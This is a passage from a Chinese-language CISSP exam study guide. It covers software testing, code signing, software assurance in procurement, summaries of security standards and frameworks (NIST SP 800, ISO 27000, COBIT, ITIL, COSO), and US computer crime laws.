型语言的错误、开发和配显错误、交易序列错误(transaction sequence faults )、映射出发 条件(mapping triggerconditions)等,通常在扫描完后需要手工进一步的核查。 ③人工测试(Acceptance testing):通过人员的经验和直觉来分析程序,通常使用计算机 技术来判断,测试人员能定位设计错误,如逻辑错误。包括渗透测试。 ④动态分析(Dynamic analysis):及时的分析正在运行的程序,一般是在静态分析之后, 程序的基本问题都被解决完后执行。 5.代码签名 code signing 代码签名是一种安全技术,可以用来确保代码完整性,确定谁开发了一段代码,并确定开 发者预期使用这段代码的目的。所有类型的代码都可以被签名,包括工具,应用,脚本,库, 插件,和其它“类代码”的数据。代码签名不是数字版权管理(DRM)或复制保护技术,它也不 能保证代码没有安全漏洞。代码签名有三个不同的目的,它可用于: ①完整性。确保一段代码没有被修改 ②来源。鉴定代码来自特定的源(开发者或签名者) ③代码的用途。为了特定的目的,确定代码是否可信赖,例如,访问一个特定项 为了使签名代码能实现这些目的,一个代码的签名由三部分组成(考点): ①一个印章/信封 seal,它是代码各个部分的校验和或哈希的集合,例如标识符,主可执 行文件,资源文件,等等。印章可用于检测对代码和应用标识符的修改。 ②一个数字签名,它签名印章以保证它的完整性。签名包含了信息,可以被用来决定谁签 名了代码和是否签名是有效的。 ③一个唯一的标识符,可以用于识别代码或代码属于哪一个组或类别。这个标识符可由签 名者明确地提供。(标识符+印章)=>签名,①+③=>② 6.回归和验收测试 只要开发者改变或修改他们的软件,即使一个很小的调整可能也会有意想不到的后果。 ①回归测试(考点) 回归测试是指对现有的软件应用进行复核式检查,以确保之前的某些变更行为并没有破坏 其功能或安全性。执行回归测试时,主要考虑的是足够的覆盖范围和不会浪费时间。 ②使用测试库 最有效的回归测试的方法是基于开发一个测试库,由标准测试用例组构成,它可以在任何 有程序的新版本构建时运行。建立一个测试库最困难的部分涉及到包含哪一个测试用例。很多 敏捷环境使用工作流的做法,例如 XP(极限编程),RUP(统一软件开发过程),或者 Scmm 使用 回归测试作为一个动态的,迭代的开发和部署计划的一个重要方面。 —263— ③验收测试 验收测试是执行的一个正式测试,以确定一个系统满足其验收标准且使用户可以决定是否 接受该系统。这在最初被称为功能测试,它不同于单元测试,通常在一个完整的系统上进行。 ④敏捷开发环境中的验收测试 在敏捷软件开发中,验收测试/标准通常由业务用户创建并使用业务领域的语言表达。这 些是高层次的测试,以验证一个用户故事或故事集的完整性,它被在任何的冲刺/迭代的过程 中被“执行”。理想情况下,这些测试通过业务客户,业务分析员,测试员,和开发者合作创 建的。重要的是这些测试包括业务逻辑测试同时也包括 UI 验证元素。业务客户(产品所有者) 是这些测试的主要人员。当用户故事通过他们的验收标准后,业务所有者可以放心认为开发者 在朝着正确的方向前进。 D.评估采购软件的安全影响 当组织购买软件时,安全专业人员必须了解软件的合理配置以满足安全目标,还必须修复 安全漏洞。在 SaaS 环境下,大多数安全责任在供应商侧,但甲方的安全人员也要负责监控供 应商的安全,包括审计、评估、漏洞扫描和其他措施等。 1.软件保障(SWA) 根据美国国家安全系统委员会国家信息保障(IA)法案,CNSS 指令 4009 号,2010 年,4 月 26 日,69 页:“软件保障是对软件信心的水平,其没有漏洞,无论是故意设计到软件中还是 意外地在其生命周期中插入的,并且它以预期的方式工作。”SWA 是至关重要的,因为急剧增 加的业务和使命的风险是由于软件不能按预期执行并可以被利用引起的。为了确保业务运作和 关键基础设施中的关键资产的完整性,软件必须可靠和安全。 2.SwA 阶段 SwA 可以围绕着一个通用的采购过程的主要阶段组织。主要的阶段是: 规划—合同—监控和验收—后续 ①计划/规划阶段 Planning 这个阶段开始于:需要确定采购的软件服务或产品,识别潜在的替代软件的方法,并确定 这些替代品相关的风险。 ②招标/合同阶段 contracting 这个阶段包括三个主要的活动:*创建/发出邀约;*评估供应商;*落实谈判。 ③监控和验收阶段 monitoring and acceptance 监控供应商的工作并根据合同接受最终交付的服务或产品。 ④后续阶段 follow on 维护软件(该过程通常被称为维持)。 —264— 第九域 考试重难点归纳 A.新旧大纲对比 具体不列举了,现在的学习资料都是新大纲的,相关对比在“九阴真经”之 CBK 的内容里 有详细的文档,而且在 AIO7 英文版里,把新增内容的标签都加粗了。如果最初复习是以 AIO6 为主的,需要补充学习新增的内容。有的培训班到 2017 年了,用的资料居然还以老大纲的十 个域的内容和习题为主,讲师还没有整理出成体系的新教材。 B.官方教材要点汇总 CBK、OSG、AIO 这 3 本权威教材每个章节后面列举的知识要点,是必须掌握的,可以对照 自查,这里不复制粘贴了。 推荐 2 本 2016 年最好的英文辅导书,绝对的宝典,完成是针对考试的要点整编和应试技 巧,只是来不及翻译了,都收录在“九阴真经”之 OSG 里了,自己看吧。分别是:03_CISSP Study Guide, Third Edition-2016,最新版英文核心辅导材料;和 04_CISSP Comprehensive Review Notes-2016,最新版英文学习笔记。前者就像是考试真题的出题者在介绍考试重点;后者则是 像学霸的必考要点学习笔记。 C.法规标准汇总 几乎所有的考试内容都是从某个法规、标准、指南中引用来的。CISSP 不考某国的法规标 准,只考国际的,不过美国、欧洲的一些代表性典型基础法规也会考到。先熟悉相关组织机构: 1.美国的 ①NIST(National Institute of Standards and Technology),美国国家标准与技术研 究院。CISSP 最重要的理论来源,基本完全引用了它的术语。 ②NSA(NationalSecurityAgency),美国国家安全局。 ③DOD(Department of Defense),美国国防部。 2.其它的 ①ISO(International Organization for Standardization),国际化标准组织。目前 世界上最大、最有权威性的国际标准化专门机构。 ②IEC(InternationalElec-trotechnicalCommission),国际电工委员会。成立于 1906 年,负责有关电气工程和电子工程领域中的国际标准化工作,总部设在瑞士日内瓦。 ③ITU(InternationalTelecommu-nicationUnion),国际电信联盟。由法、德、俄等 20 个国家在巴黎会议上为了顺利实现国际电报通信而成立的国际组织。ITU 的实质性工作由三 大部门承担:国际电信联盟标准化部门、国际电信联盟无线电通信部门和国际电信联盟电信发 展部门。 ④IEEE(Institute of Electrical and Electronics Engineers),电气和电子工程师 协会。国际性的电子技术与信息科学工程师的协会,全球最大的非营利性专业技术学会。 ⑤BSI(British Standard Institution),英国标准协会。举世闻名的,集标准研发、 标准技术信息提供、产品测试、体系认证和商检服务五大互补性业务于一体的国际标准服务提 —265— 供商,面向全球提供服务。 ⑥EU(European Union)欧盟。根据 1992 年签署的《欧洲联盟条约》(也称《马斯特里 赫特条约》)所建立的国际组织,现拥有 28 个会员国。欧盟是世界上最有力的国际组织之一, 在贸易、农业、金融等方面趋近于一个统一的联邦国家,而在内政、国防、外交等其他方面则 类似一个独立国家所组成的同盟。 ⑦ENISA(The European Union Agency for Network and Information Security),欧洲 网络与信息安全局。 C.1 重要的系列法规 一、NIST SP 800 系列 NIST SP 800是美国国家标准与技术研究院发布的一系列关于信息安全的技术指南文件(SP 是 Special Publications 的缩写),提供了可供参考的方法和经验。虽然 NIST SP 并不是强 制性的法定标准,但已经成为美国和国际安全界得到广泛认可的事实标准和权威指南。截至 2011 年,NIST 访问控制系列已经出版了 17 个簇类、126 本信息安全相关的正式文件,形成了 从计划、风险管理、安全意识培训和教育以及安全控制措施的一整套信息安全管理体系。 1.基础类 ①SP 800-12(计算机安全介绍:NIST 手册,1995 年) 论述了计算机安全控制的益处以及其合理应用的条件,帮助读者理解计算机安全需求。 ②SP 800-14(信息系统安全的公认原则和实践,1996 年)(第三域) 提供了机构用来建立和检查 IT 安全程序的基线,和管理各种事务的基础参考。 2.访问控制类 ①SP 800-120(EAP 方法在无线网络访问身份验证的建议,2009 年) 描述了使用创建的密钥进行身份验证的安全需求。 ②SP 800-103(身份凭证,第一部分本体论,背景和公式化,2006 年) 描述了身份凭证的本体论,通过 XML 架构的形式明确表示。 ③SP 800-122(个人识别信息 PII 保密指南,2010 年) 帮助联邦机构保护个人识别信息的机密性。 ④SP 800-73(个人身份验证接口) ⑤SP 800-76(生物识别数据规范的个人身份验证) ⑥SP 800-77(IP 协议(IPSec)虚拟专网 VPN 指南) ⑦SP 800-78-3(个人身份验证的加密算法和密钥规格 PIV,2010 年) ⑧SP 800-125(安全虚拟化技术指南) 3.意识培训类 ①SP 800-100(信息安全管理指南/手册,2006 年) 从管理层面对意识和培训进行了描述,提供了信息安全规划各部分的概述,帮助建立和实 施信息安全项目。 ②SP 800-16(信息系统安全培训要求:基于角色和效能的模型)战术层面、针对政府。 ③SP 800-50(建立信息安全意识和培训方案,2003 年)策略层面、针对企业组织。 —266— 4.认证认可&安全评估 认证认可和安全评估是以 FIPS 200 为基础,从测试和评估、身份验证、性能测量、安全 控制措施评估等多个方面进行了规范。 ①SP 800-115(信息安全测试和评估技术指南,2008 年) 是关于信息安全评估基本技术的指南,描述了机构在进行评估时可能用到的技术测试、检 测方法和相关技术,为评估人员在系统和网络上关于执行和潜在影响提供了深刻的理解。 ②SP 800-53 Rev.3(联邦信息系统安全控制措施评估指南,2009 年)(第一域) 在商业领域,审计人员遵循 CobiT 提供的“检查列表”来评估组织的合规性; 在机座机构,审计人员使用 SP 800-53 作为“检查列表”来评估机构的合规性。 它们有重叠也有差异,作为保护美国联邦系统的控制集,800-53 描述了信息系统安全控 制措施,为不同级别的系统推荐了不同强度的安全控制集(包括管理、技术和运行类)。为帮助 机构对它们的信息系统选择合适的安全控制集,该指南提出了基线这一概念。基线安全控制是 最小安全控制集,针对三类系统影响级别,它列出三套基线安全控制集(基本、中、高)。 ②SP 800-53A Rev.1(联邦信息系统的安全访问控制指南,建立有效的安全评估计划) 是 SP 800—53 Rev.3 的附属指导方针,对信息系统的安全控制措施实施评估,它为创建 有效的安全评估计划和联邦政府执行机构的信息系统中实施的程序进行安全控制措施有效性 的评估提供指南。指南已经从技术层面发展到对国家安全系统的补充性指南,也可以在合适的 联邦官员的允许下适用于国家安全系统。它用 2 个指标来评价程序实施,一个是深度 depth, 一个是广度 coverage。 ③SP 800-18 Rev.1(制定信息技术系统安全计划指南,2006 年)(第二域) 为联邦机构对联邦信息系统制定系统安全计划提供了指南。描述了系统所有者、数据所有 者、数据监管员等角色的职责。 5.配置管理类 ①SP 800-128(信息系统安全配置管理指南,2010 年) 为负责管理和执行联邦信息系统计算环境安全的机构提供指南,包括信息的处理、存储和 通过外部或者面向服务的计算环境(如云计算环境提供者)进行传输的安全,指南的安全配置管 理概念和原则可以帮助机构为外部计算服务的提供者建立保证的必要条件。 ②SP 800-126 Rev.1(安全内容自动化协议技术规范(SCAP),2010 年) 定义了 SCAP 协议 v1.1 版本的技术规范,为系统配置的标准化以及对系统配置的脆弱性评 估提供了一种统一的方法。 ③SP 800-114(确保远程办公和远程访问外部设备用户指南) 帮助指导远程办公者使用的外部设备的安全,例如个人笔记本电脑以及手机等,文档特别 关注于远程办公访问机构非公开计算资源的安全。 ④SP 800-111(终端用户设备的存储加密技术指南) 帮助机构理解终端用户设备的存储加密技术,以及规划、实施和维护存储加密方案。 ⑤SP 800-70 Rev.1(国内 IT 产品清单方案——用户和开发人员的指南) 方便开发和发布安全配置清单,帮助组织和个体用户更好地保护其信息技术产品,减少其 被攻击的可能性。文档描述了安全配置列表和它们的优点,并解释了如何使用 NCP 查找和获取 —267— 列表,以及参与到 NCP 的策略、流程和通用要求。 ⑥SP 800-27(信息技术安全工程原则-修订版 A)(第三域) 6.风险评估类 ①SP 800-30(信息技术系统风险管理指南,2002 年)(第一域) 开发了一套风险管理方法:信息技术体系风险管理指南(Risk Management Guide for Information Technology System)。介绍了风险评估的步骤及方法,提供了一套用以开发出有 效的风险管理过程的办法,以帮助组织更好地管理和 IT 相关的业务面临的风险。它包括对 IT 系统中风险评估和规避的定义和实践的指南,提供用于选择适当的安全控制措施的信息。 ②SP 800-39(信息系统风险管理:组织的角度,2011 年) 是 NIST 开发的与 FISMA 相关的安全标准和指导方针系列中的旗舰文档,其中提供了一系 列有意义的改进建议。文档旨在为集成的、组织范围的联邦信息系统的操作和使用来管理信息 安全风险的程序提供指南,包括组织的运营(例如:任务、功能、形象和声望)、组织的评估等。 ③SP 800-60 Rev.1(信息与信息系统安全分类的指南,2008 年)(第二域) 遵循 FISMA(电子政务法案的第三章联邦信息安全管理方案)的指导,为根据各种可能潜在 的安全冲击对信息及信息系统进行分类提出指导方针,帮助联邦部门将不同的安全冲击级别映 射到:(1)信息(如机密信息、医学信息、私人信息、金融信息、合约敏感信息、贸易机密信息、 调查研究信息);(2)信息系统(如任务评价系统、任务支持系统、行政管理系统)。此外,SP 800-53A 的安全控制措施评估也属于风险评估的一个步骤。 ④SP 800-37 Rev.1(联邦信息系统风险管理框架 RMF:安全生命周期方法)(第一域) 为实施联邦信息系统的风险管理框架提供了指南,提出了将风险管理系统(RMF)应用于信 息系统的方法。包括六步:安全分类、安全控制选择、安全控制实现、安全控制评估、信息系 统授权和安全控制监管。即: 1)分类。对信息系统进行分类。 2)选择。选择该系统安全控制的初始化基线集,并根据风险和评估情况修订安全控制基线。 3)实施。实施安全控制,并描述如何部署控制。 4)评估。评估安全系统,确定一个范围以保证控制的有效实施并达到预期效果。 5)授权。允许信息系统可以正常运行和操作,确定其风险是可接受的。 6)监控。实时监控信息系统中的安全控制,掌握情况变化,分析并向特定组织机构报告系 统的安全状态。 指出风险管理系统有以下特点: 1)鼓励其自动化操作,向高层领导者提供必要的辅助决策信息。 2)将信息安全与公司系统结构以及系统开发生命周期相结合。 3)强调选择、实施和评估以及安全控制的监管和信息系统的授权。 4)通过风险管理(功能)将系统层面与组织层面的风险管理过程相联系。 ⑤SP 800-137(联邦信息系统和组织的信息安全持续监控 ISCM)(第六域) 安全实践者需要确定系统的监控频率或安全控制的评估频率时,把下列准则考虑在内: 1)安全控制的易变性:易变的安全控制应被更频繁地评估,无论评估目的在于确定安全控 —268— 制的有效性还是支持对度量指标的计算。 2)系统分类/影响水平:一般来说,分类为高影响度系统的安全控制要比中、低影响度的 系统上被更频繁地监控。 3)提供关键功能的安全控制或特走评估目标:提供关键功能的安全控制或特定评估目标 (比如日志管理服务器,防火墙)应当更频繁地被监控。另外,支持关键安全功能的个别评估目 标被认为是对系统很关键的(根据业务影响分析)。 4)对于己经辨识的弱点的安全控制:一般认为,已经记录在安全评估报告(SARs)的现存风 险需要更频繁地监控以确保风险在可容忍范围内。 5)组织风险容忍水平:对风险容忍水平低的组织(比如处理,存储,或传输大量专有和/ 或个人身份识别信息的组织,有大量高等级系统的组织,面临特定持续性威胁的组织〕会比对 风险容忍水平高的组织(比如拥有大量中低等级的系统,基本不处理,存储或传输专有的/或个 人身份识别信息的组织)更频繁地监控安全态势。 6)威胁信息:组织要考虑现有可信的威胁信息,包括己知的漏洞,攻击场景。 7)薄弱点信息:在决定监控频率时,组织要考虑与信息技术产品相关的最新薄弱点信息。 比如,如果一个特定产品厂商每月提供软件补丁,组织就可以考虑至少每月一次执行漏洞扫描。 8)风险评估结果:检查组织的、或系统的风险评估结果,并在决定监控频率时考虑这些结 果的影响。如果在组织内部有风险打分系统,风险的分值可能被用来证明增加或减少对相关控 制的监控频率的合理性。 9)报告要求:报告要求不会驱动 ISCM 战略,但是可能对监控频率产生影响。比如如果组 织策略要求每个季度报告非授权组件数量和采取的纠正性行动,组织将至少每季度监控系统以 发现非授权组件。 二、ISO 27000 系列 对于企业组织来讲,就像个人要考 CISSP 认证一样,它也期望向获得认可的第三方机构寻 求 ISO/IEC 27001 认证证书,可以证明其公司范围内的安全实践水平。还有什么 ISO-9001 认 证的,都是为了证明资质、提高声誉。后面这些标准在 AIO6 书上都有详细描述,不会考具体 内容的。 1.发展历程 英国标准 BS 7799(British Standard 7799)是由英国政府工贸部 1995 年开发并由英国标 准化机构(British Standard Institution)发布。这个标准概括出信息安全管理体系 ISMS(又 名安全规划)应该如何建立和维护。其目标是指导组织设计、实施和维护策略、过程及技术, 以便于管理组织的敏感信息资产面临的风险。它包括 2 部分:第一部分,描述了控制目标和为 实现这些目标可使用的控制措施范围(Code of Practice for Information Security Management),它于 2000 年被采纳为 ISO/IEC 17799,目前其最新版本为 2005 版,也就是常 说的 ISO 17799:2005。;第二部分描述了如何建立和维护安全规划(for Information Security Managemenet Specification)(信息安全管理体系 ISMS),同时也作为对组织进行认证的基线, 其最新修订版在 2005 年正式成为 ISO-27001。 ISO 和 IEC 对 BS7799 进行了升级和优化,开发了 27000 系列标准,成为国际标准。它是 —269— 由信息安全方面的最佳惯例组成的一套全面的控制集,是信息安全管理方面最受推崇的国际标 准。最重要的是 27001 和 27002。 ①ISO-27000 基础原理与名词解释(Principles and vocabulary) ②ISO-27001 信息安全管理体系-建设要求(ISMS Requirements,以 BS 7799-2 为基础) ③ISO-27002 信息安全管理体系-最佳实践(以 ISO/IEC 17799:2005 为基础) ④ISO-27003 信息安全管理体系-实施指南 ⑤ISO-27004 信息安全管理体系-测量指南与指标框架 ⑥ISO-27005 信息安全管理体系-风险管理指南,规定在 ISMS 框架内如何进行风险管理 ⑦ISO-27006 信息安全管理体系-审核与认证机构指南(Requirements for the accreditation of bodies providing certification) 1-5 记忆:要求、实践、实施、测量、风险管理。 2.ISO 其它的相关标准 ①ISO-15408 1996 年六国七方签署了《信息技术安全评估通用准则》即 CC 1.0。1998 年 美国、英国、加拿大、法国和德国共同签署了书面认可协议。后来这一标准称为 CC 标准,即 CC 2.0。CC 2.0 版于 1999 年成为国际标准 ISO/IEC 15408,我国于 2001 年直接来过来作为 GB/T 18336。 目前已经有 17 个国家签署了互认协议,即一个 IT 产品在英国通过 CC 评估以后, 那么在美国就不需要再进行评估了,反之亦然。目前我国还未加入互认协议。 ②ISO/IEC-42010 包含一套推荐做法,旨在简化软件密集型系统体系结构的设计和概念。 这个标准提供了一种语言(术语)来描述软件体系结构和如何把它融入开发生命周期中。许多 时候,开发人员实际开发时,不会完全参照某一个软件体系结构的整体标准,这个标准就提供 了一个可遵循的概念框架。 ③ISO/IEC-27799 医疗机构信息安全管理指南。 ④ISO/IEC-21827:2008《系统安全工程能力成熟度模型》(SSE-CMM)(第三域) 该模型是安全工程实践规范的一种标准测量尺度,涵盖了以下方面: 1)整个生命周期,其中包括开发、操作、维护和退役方面的活动。 2)整个机构,其中包括机构层面和工程层面的活动。 3)与其他方面的交互,如系统、软件、硬件、人的因素、测试工程、系统管理、运维等。 4)与其他机构的交互,其中包括采购、系统管理、认证、认可和评估。 ⑤ISO/IEC 27034。关于软件开发的标准。ISO/IEC 27034 标准包括以下条目:应用安全 综述和概念、组织规范框架、应用程序安全管理过程、应用安全验证以及特定应用的安全指南。 它是 ISO/IEC 27000 系列的一部分,它能让安全的软件开发过程与 ISO/IEC 的信息安全管理体 系(ISMS)模型相一致。 三、COBIT 目标/IT 治理 CobiT 信息及相关技术控制目标(Conrol Objectives for Information and related Technology),是由国际信息系统审计协会(ISACA)和 IT 治理协会 ITGI 联合开发的 IT 管理控 制目标集,记录了一整套优秀的 IT 安全实践,规定了对安全控制的目标和要求,鼓励将 IT 的理想安全目标映射到商业目标中,也可以作为组织审计的指导方针。对于 IT 治理,CobiT —270— 提供了一个“检查列表”的方法,也就是在实现不同的 IT 功能时,需要提供一系列经过深思 熟虑完成的材料。CobiT 规定了执行摘要、管理指南、框架、控制目标、实现工具集、性能指 标、成功因素、成熟度模型和审计准则。它勾画出一个完整的可以遵循的路线图来完成这种模 式涉及的 34 个控制目标中的每一个。CobiT 分成 4 个领域,每个领域又细分为子类别: ①计划和组织(Plan and Organize) ②获得与实现(Acquire and Implement) ③交付与支持(Deliver and Support) ④监控与评价(Monitor and Evaluate) CobiT 规定了执行摘要、管理指南、框架、控制目标、实现工具集、性能指标、成功因素、 成熟度模型和审计准则。它勾画出一个完整的可以遵循的路线图来完成这种模式涉及的 34 个 控制目标中的每一个。COBIT 5 把驱动控制目标划分为七种动力因子,关于企业 IT 治理和管 理的五个关键原则是: 原则 1: 满足利益相关者的需求;Meeting stakeholder needs 原则 2: 对企业做到端到端的覆盖;Covering the enterprise end-to-end 原则 3: 使用单一的集成框架;applying a single integrated framework 原则 4: 使用整合处理法;enabling a holistic approach 原则 5: 把治理从管理中分离出来。Separating governance from management —271— 四、ITIL 服务/流程管理 在当前市场环境下,客户服务的好坏直接受 IT 系统的影响,IT 服务管理成为企业业务运 作过程中不可或缺的重要一环。需要强调的一点是:ITIL 不是一个正式标准,而是普遍实行 的“事实”上的标准。 IT 基础架构库(Information Technology Infrastructure Library, ITIL),即信息技术 基础架构库,它是由英国商务部开发的用于 IT 服务管理的过程。由英国政府部门 CCTA(Central Computing and Telecommunications Agency)在 20 世纪 80 年代末制订,现由英国商务部 OGC(Office of Government Commerce)负责管理,主要用于 IT 服务管理(ITSM),提供了一 个客观、严谨、可量化的标准和规范,也可用于其它领域。 1.ITIL 包含 6 个模块内容 业务管理、服务管理、ICT 基础架构管理、IT 服务管理规划与实施、应用管理和安全管理。 其中服务管理是其最核心的模块,该模块包括“服务提供”和“服务支持”两个流程组。 2.ITIL 包含 5 个生命周期 ①战略阶段(Service Strategy); ②设计阶段(Service Design); ③转换阶段(Service Transition); ④运营阶段(Service Operation); ⑤改进阶段(Service Improvement)。 3.ITIL 包括 5 类管理流程 ①事件管理(Incident Management) 目标:在不影响业务的情况下,尽快恢复服务,以保证最佳的效率和服务的可持续性。 ②问题管理(Problem Management) 目标:调查分析日志、事件等数据,确定事件隐患,提交服务中的潜在故障。 ③配置管理(Configuration Management) 目标:定义和控制服务与基础设施的部件,并保持准确的配置信息。 ④变更管理(Change Management) 目标:以受控的方式,确保所有变更得到评估、批准、实施和评审。 ⑤发布管理(Release Management) 目标:在实际运行环境的发布中,交付、分发并跟踪一个或多个变更。 —272— 五、COSO/企业内控 其实 CobiT 是从 COSO 演变而来的。但 COSO 是企业治理模型,而 CobiT 是 IT 治理模型。 COSO 委员会是专门研究内部控制问题的。COSO 就是美国反虚假财务报告委员会下属的发 起人委员会的英文缩写(The Committee of Sponsoring Organizations of the Treadway Commission)。1992,COSO 委员会发布《内部控制整合框架》,简称 COSO 报告,1994 年进行 了增补。根据 2002 年萨班斯法案第 404 节条款(SOX)以及美国证券交易委员会(SEC)的相 应实施标准,要求:公众公司的管理层评估和报告公司最近年度的财务报告的内部控制的有效 性。这表明 COSO 框架已正式成为美国上市公司内部控制框架的参照性标准。COSO 报告提出内 部控制是用以促进效率,减少资产损失风险,帮助保证财务报告的可靠性和对法律法规的遵从。 总之,COSO 用于公司内部治理,由反欺诈财务报告全国委员会发起组织委员会(COSO)开发, 旨在帮助降低财务欺诈风险的国内公司控制集。COSO-2013 标准有 4 个目标和 8 个组成部分。 1.COSO 内部控制的 4 个目标 ①符合企业的长期目标; ②经营高效、用好资源、卓有成效; ③可靠的财务报告; ④合规。 2.COSO 的 8 个组成部分 ①内部环境:考虑风险基准(基线) ②设定目标:管理过程来支持和配合企业的目标 ③事件识别:确定内部和外部影响企业目标的事件。 ④风险评估:考虑可能性和影响,以及怎样管理这些风险属性。 ⑤风险响应:对每个资产,选择一种适当的应对措施:接受、减缓、转移或回避(拒绝)。 ⑥控制活动:制定并执行策略,确保风险响应的有效性。 ⑦信息和沟通:获取并共享相关信息,使人员能够履行他们的职责。 ⑧监控:评估整个 ERM(企业风险管理)活动,并做出必要的改变。 —273— C.2 安全与风险管理方面 1.安全方案开发 ISO/IEC 27000 系列 2.企业架构开发 ①Zachman:全球第一个企业架构开发模型,是一种逻辑结构,用一种可以理解的信息来 表述企业架构。该框架采用了一种 6 行,每行中包含 36 个子单元的格式: 六行包括了——范围、商业模式、系统模式、技术模式、组件、工作系统; 六列分别为——谁、什么、什么时间、什么地点、为什么、如何做。 ②TOGAF:开放组体系结构框架(The Open Group Architecture Framework)是行业标准的 体系架构框架,可以被任务组织自由使用。它由国际标准权威组织 The Open Group 制定。 ③DODAF:美国国防部制定的系统体系结构框架,其前身是 C4ISR,用于保障军事任务完 成过程中系统间的互操作性,提供了 8 种不同角度的视图。 ④MODAF:英国国防部体系架构框架(MODAF)也是一个架构框架,最初的目的是支持网络 使能能力(NEC)。 3.安全架构开发 SABSA 安全架构框架(Sherwood Applied Business Security Architecture): SABSA®是一个方法论,它通过开发以风险作为驱动的企业信息安全和企业信息保证结构来 派生以支持关键商务的安全架构解决方案。它是一个开放式的标准,包括了大量的框架、模型、 方法和步骤,是完全免费。SABSA 也是独一无二的、完全中立的、可伸缩的,也其他标准无缝 结合,如 TOGAF 和 ITIL 什么的,并填补了“安全架构”和“安全服务管理”之间的空隙。 它是一个开发安全架构的完整生命周期,第一步是评估业务需求。它生成一个“追溯链” chain of traceability,用来描述各业务功能的安全需求,还包括策略、概念、设计、实现 和度量等阶段。它用 6 层结构来表示任何架构,每层代表一个不同的视角,比如的设计、施工 和使用目标系统等。 4.公司治理 COSO 企业内控管理模型。 5.安全控制开发 ①COBIT IT 内部控制; ②NIST 800-53 安全控制参考(基线)。 6.流程管理 ①CMMI 能力成熟度模型集成(Capabi1ity Maturity Model Integration):模型由卡内 基·梅隆大学开发,目的是优化组织的开发过程,如标准化的软件开发管理; ②ITIL 服务管理; ③六西格玛 Six Sigma:是一种过程改进方法论,也是一种业务流程管理的管理策略,摩 托罗拉工程师搞的,是一种改善企业质量流程管理的技术,以“零缺陷”的完美商业追求,带 动质量成本的大幅度降低,最终实现财务成效的提升与企业竞争力的突破,是用来开展过程改 进的业务管理策略。其目标是在生产过程中识别和消除缺陷。六西格玛背后的原理就是如果你 —274— 检测到你的项目中有多少缺陷,你就可以找出一一应对的办法,使你的项目尽量完美的方法。 它是 TQM 的升级。企业要想达到六西格玛标准,它的出错率不能超过百万分之 3.4。 7.其他 ①PMBOK, Prince2 项目管理;②ISO9000 质量管理;③ISO 38500 IT 治理;④ISO22301 业 务连续性管理。 8.风险评估的模型 ①FRAP(Facilitated Risk Analysis Process):专用的定量方法,先进行预筛选以节省 时间和金钱。 ②OCTAVE(Operationally Critical Tbreat, Asset and Vulnerability Evaluation): 面向团队的方法,通过组织研讨会来评估组织风险和 IT 风险。 ③AS/NZS 4360:澳大利亚和新西兰的一种业务风险管理评估方法。 ④失效模式和影响分析 FMEA(Failure Modes and Effect Analysis):美国航天 NASA 搞 的,是一种用来确定潜在失效模式及其原因的分析方法,可在产品设计或生产工艺真正实现之 前发现产品的弱点,可在原形样机阶段或在大批量生产之前确定产品缺陷。FMEA 有三种类型: 分别是系统 FMEA、设计 FMEA 和工艺 FMEA。 ⑤故障树分析 Fault Tree Analysis/FTA:美国贝尔公司搞的,是安全系统工程中最重要 的分析方法。事故树分析从一个可能的事故开始,自上而下、一层层的寻找顶事件的直接原因 和间接原因事件,直到基本原因事件,并用逻辑图把这些事件之间的逻辑关系表达出来。特点 是直观明了,思路清晰,逻辑性强,可以做定性分析,也可以做定量分析。 ⑥CRAMM 中央计算和电信机构风险分析管理方法:Central Computing and Telecommunications Agency Risk Analysis and Management Method。 C.3 计算机犯罪方面 1.计算机诈骗和滥用法案(Computer Fraud and Abuse Act)(历史第一个) 国会在 1984 年制定了计算机诈骗和滥用法案(CFAA),主要针对下列罪行: ①非法访问联邦系统中的机密信息或财务信息。 ②非法访问联邦政府使用的计算机,以及联邦计算机进行欺诈活动 ③对联邦计算机系统造成恶意损失超过 5000 美元的行为。 ④非法修改计算机中的医疗记录。 ⑤非法买卖计算机密码。 该法案在 1986 年进行了修正,主要拓展了使用范围,涵盖了: ①由美国政府专门使用的所有计算机。 ②由金融机构专门使用的所有计算机。 ③被用于进行犯罪的所有计算机组合。 2.计算机安全法案(CSA 1987 年)Computer Security Act of 1987 国会还是不满 CFAA 的 1986 修正案,又制定了计算机安全法案(1987 年),为所有的联邦 机构设置了安全要求基准。CSA 的四个主要目的是: ①明确由美国国家标准技术研究所(NIST)负责开发联邦计算机系统标准和准则,由美国国 —275— 家安全局(NSA)提供技术性建议和援助。 ②颁布并施行上述的标准和准则。 ③要求所有使用涉密联邦计算机系统的操作人员,都要制定安全计划。 ④所有相关的 管理、使用和操作人员强制性参加定期培训。 ⑤它还指定了 NIST 负责公开系统的安防,NSA 负责机密级系统的安防。 这条法案的相关要求经过多年演进后,形成了联邦计算机安全策略的基础。 3. CFAA 修正案(1994 年) 1994 年,国会对上述法案又进行了大改。包括以下条款: ①生成任何类型恶意代码的行为是不合法的。 ②法案适用于所有被用于州间贸易的计算机。 ③允许关押罪犯,不管他们是否造成了实际的损坏。 ④计算机犯罪的受害者可以提起民事诉讼,其受到的损失可以获得减轻和补偿。 2015 年,奥巴马也准备做个修改,把计算机犯罪纳入 RICO 条款范围中,即反诈骗腐败组 织集团犯罪法(the Racketeer Influenced and Corrupt Organizations Act),不知道现在正 式颁布没有。 4.国家信息基础设施保护法案(1996 年)(National Information Infrastructure Protection Act of 1996) 1996 年,国会还是不满 CFAA,又通过了一系列修正案,再进一步扩展了其保护的范围, 包括以下新覆盖的领域: ①放宽了法案的范围,除了用于州间贸易的计算机,还包括用于国际贸易的计算机系统。 ②扩展了对国家基础设施(铁路、燃气、电力和通信线路等)的类似保护。 ③故意造成国家基础设施重大损坏的行为,要从重处理。 5.联邦判决指导方针(Federal Sentencing Guidelines) 1991 年发布的联邦判决指导方针主要提供计算机犯罪的处罚指导、解释说明等,它最重 要的三个条款是: ①提出审慎者规则(prudent man rule)。就是要谨慎工作,这种规则要求高管确保他能 常态化的、持续的保持适度关注(due care)的态度;其它人员同样也要求保持谨慎工作的态 度。这个规则以前用在在财政领域。(就是领导责任制) ②提出从轻处罚规则。对于有违法行为的组织机构和执行官,如果它能证明其保持并运用 了适度关注的原则,并履行了自己的信息安全责任,那么可以从轻处罚。 ③明确了要证明疏忽或差错确实成立的三个要素。即:被控人员必须具有法律上认可的责 任;被控人员必须未遵守公认的标准;疏忽行为和后续损害之间必须存在因果关系。 ④高管渎职可以处以最高 2 亿美元的罚款。 6.文书精简法案(1995 年)(Paperwork Reduction Act of 1995) 文书精简法案(199 年)要求组织机构必须获得美国行政管理和预算局 OMB(Office of Management and Budget) 的批准后,才能请求使用各类基础公共信息。2000 年的政府信息安 全改革法案 